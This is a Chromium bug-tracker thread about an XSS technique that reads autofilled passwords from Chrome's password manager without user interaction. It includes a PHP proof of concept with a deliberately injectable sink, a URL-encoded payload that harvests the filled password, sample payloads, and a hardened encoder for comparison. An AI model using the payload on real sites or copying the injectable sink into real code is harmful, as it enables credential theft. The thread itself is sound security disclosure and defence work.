Starred by 3 users
Status: WontFix
Closed: Jan 2017
Type: Bug-Security
Security: User Password Leakage from Password Manager by XSS without User Interation
Reported by har...@gmail.com, Jan 17 2017
VULNERABILITY DETAILS
It seems Chrome prohibits getting the user's password from the password manager by XSS. When a malicious script tries to read the password field, it returns a blank value even if the field looks like it has been filled by the password manager. After a user operation, such as a key press or a click on any HTML element, the script can get the password that was filled in by the password manager.
However, when the user moved to the XSSed page by using JavaScript, for example by using location.href, a malicious script can get the password without any user operation.
It seems that the security restriction of the password manager is bypassed.
And I think this should be fixed because it is similar to the case below:
https://finnwea.com/blog/stealing-passwords-from-mcdonalds-users

VERSION
Chrome Version: 55.0.2883.87 m
Operating System: Windows7 SP1 and OS X 10.11.6

REPRODUCTION CASE
I put a demonstration on my server: http://133.242.134.241/exploit/chrome_password_manager.php

The source of this PHP is below:
<body>
<?php
// First visit: no xss parameter and no submitted form yet, so show the
// login form and let the password manager offer to save the (dummy) credential.
if(!isset($_GET["xss"]) && !isset($_POST["pass"])) {
?>
Please submit id/pass to use password manager.
<form action="?" method="post">
<input name="id"><br>
<input type="password" name="pass">(use dummy password)<br>
<input type="submit">
</form>
<?php
}else{
?>
Please click below to fire XSS.<br>
<a href="?xss=%27%3bf=document.createElement(%27form%27)%3bf.action=%27login_exec.cgi%27%3bdocument.body.appendChild(f)%3bf.innerHTML=%27%3Cinput%20name=login_id%3E%3Cinput%20type=password%20name=password%3E%27%3bi=setInterval(function(){p=document.forms[0].password.value%3bif(p!=%27%27){alert(p)%3bclearInterval(i)}},100)%3b%27">a tag (does not work without user operation)</a><br>
<a href="#" onclick="location.href='?xss=%27%3bf=document.createElement(%27form%27)%3bf.action=%27login_exec.cgi%27%3bdocument.body.appendChild(f)%3bf.innerHTML=%27%3Cinput%20name=login_id%3E%3Cinput%20type=password%20name=password%3E%27%3bi=setInterval(function(){p=document.forms[0].password.value%3bif(p!=%27%27){alert(p)%3bclearInterval(i)}},100)%3b%27'">location.href (works without user operation)</a>
<script>
  // Deliberate XSS sink: the xss query parameter is echoed unescaped into a
  // single-quoted JS string literal, so a leading quote ends the literal and
  // the rest of the parameter runs as script.
  var a='<?php echo $_GET["xss"] ?>';
</script>
<?php
}
?>
</body>


Best regards,
Haru 
 
Components: UI>Browser>Passwords
>It seems Chrome prohibits getting the user's password from the password manager by XSS.

I'm not aware of any attempt to prevent reading of an autofilled password field from JavaScript, but even if there were such a feature, it couldn't be effective. An attacker could easily use script to modify the form target and submit it, leaking the credentials.

This is similar to Issue 659953; XSS attacks are inherently powerful, and theft of credentials is but one consequence of that.
Status: WontFix
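The thread settles that the password-field gate is not an XSS mitigation, so the only real fix is the injection itself. The added example below (not code from the report or from Chromium) reproduces the PoC's sink, `var a='<?php echo $_GET{"xss"} ?>';`, as a JavaScript template rather than PHP, beside a hardened sink that encodes the untrusted value for a `<script>` string-literal context. Function names, the helper that counts `</script>` closers, and the sample payloads are all constructed for this example.

```javascript
// Vulnerable sink, same shape as the report's PHP: the untrusted value is
// pasted raw between single quotes, so a leading quote ends the literal and
// whatever follows runs as code.
function renderVulnerable(untrusted) {
  return `<body><script>var a='${untrusted}';</script></body>`;
}

// Encode any value as a JS string literal that is safe inside <script>.
// JSON.stringify escapes quotes, backslashes and control characters; the
// extra replace turns < > & ' / and the U+2028/U+2029 line terminators into
// \uXXXX escapes, so the output can neither close the <script> element nor
// end the string literal, whichever quoting the surrounding template uses.
function toJsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&'\/\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0')
  );
}

// Hardened sink: the encoder supplies its own double quotes, so the template
// adds none of its own.
function renderHardened(untrusted) {
  return `<body><script>var a=${toJsStringLiteral(untrusted)};</script></body>`;
}

// Number of </script> closers in a rendered page. One is the wrapper tag;
// anything more means the payload broke out of the script element.
function closingScriptTags(html) {
  return html.split('</script>').length - 1;
}

// Constructed payloads modelled on the shape of the report's payload (a
// quote to close the literal, then arbitrary script) and on the classic
// tag-closing variant.
const SAMPLE_PAYLOADS = [
  "';f=document.createElement('form');//",
  "</script><script>alert(1)</script>",
];

for (const p of SAMPLE_PAYLOADS) {
  console.log('vulnerable:', renderVulnerable(p));
  console.log('hardened:  ', renderHardened(p));
}
```

Encoding closes the sink the PoC depends on; it does nothing to the gatekeeper behaviour discussed in this thread, which, as the reply says, cannot defend against script that already runs in the page. For the form-retargeting route the reply describes, a `Content-Security-Policy` `form-action` directive limiting where forms may submit is a defence-in-depth layer, again only meaningful alongside fixing the injection.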
Comment 3 by har...@gmail.com, Jan 18 2017
Thank you for your confirmation. I understand this is by design.
I think that Chrome users who use the password manager must know this risk. Could you please change the permission of this ticket from Restrict to Public?
Labels: -Restrict-View-SecurityTeam allpublic
> I'm not aware of any attempt to prevent reading of an autofilled 
> password field from JavaScript

I was mistaken. This does exist, but it's trivially circumvented. The class in question is PasswordValueGatekeeper, found in password_autofill_agent.h

The remainder of the remark is correct, however (this isn't intended or effective as a mitigation against XSS).
Issue 726309 has been merged into this issue.